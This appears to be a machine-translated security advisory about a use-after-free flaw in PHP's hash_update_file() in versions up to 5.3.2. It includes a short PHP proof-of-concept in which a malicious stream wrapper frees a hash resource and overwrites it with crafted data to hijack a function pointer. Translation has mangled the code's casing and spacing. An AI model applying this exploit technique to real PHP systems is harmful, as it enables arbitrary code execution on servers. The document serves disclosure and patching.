PHP hash_update_file () function access released resource Vulnerability

Affected Versions:
PHP <= 5.3.2
PHP <= 5.2.13
Vulnerability description:
PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.

When calling the hash_update_file () function of PHP, the function first needs to retrieve the resource data and then read the data from the stream to perform the hash operation. A malicious user space stream processor can release hash resources from the read processor and replace them with specially crafted counterfeit resources, which may contain modified hash function pointers. When the internal function continues to perform hash calculation, it will call the overwritten function pointer, resulting in malicious code execution. <* Reference
Html> http://php-security.org/2010/05/01/mops-2010-001-php-hash_update_file-already-freed-resource-access-vulnerability/index.html
*>
Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! <? Php
Define ("OFFSET", pack ("L", 0x55555555 ));

Class AttackStream {
Function stream_open ($ path, $ mode, $ options, & $ opened_path)
{
Return true;
}

Function stream_read ($ count)
{
Hash_final ($ GLOBALS [hid], true );
$ GLOBALS [aaaaaaaaaaaaaaaaaaaaaaaa] = str_repeat (OFFSET, 3 );
Return "";
}

Function stream_eof ()
{
Return true;
}

Function stream_seek ($ offset, $ whence)
{
Return false;
}
}

Stream_wrapper_register ("attack", "AttackStream") or die ("Failed to register protocol ");

$ Hid = hash_init (md5 );
Hash_update_file ($ hid, "attack: // nothing ");
?> SEBUG Security suggestions:
Vendor patch:

PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.php.net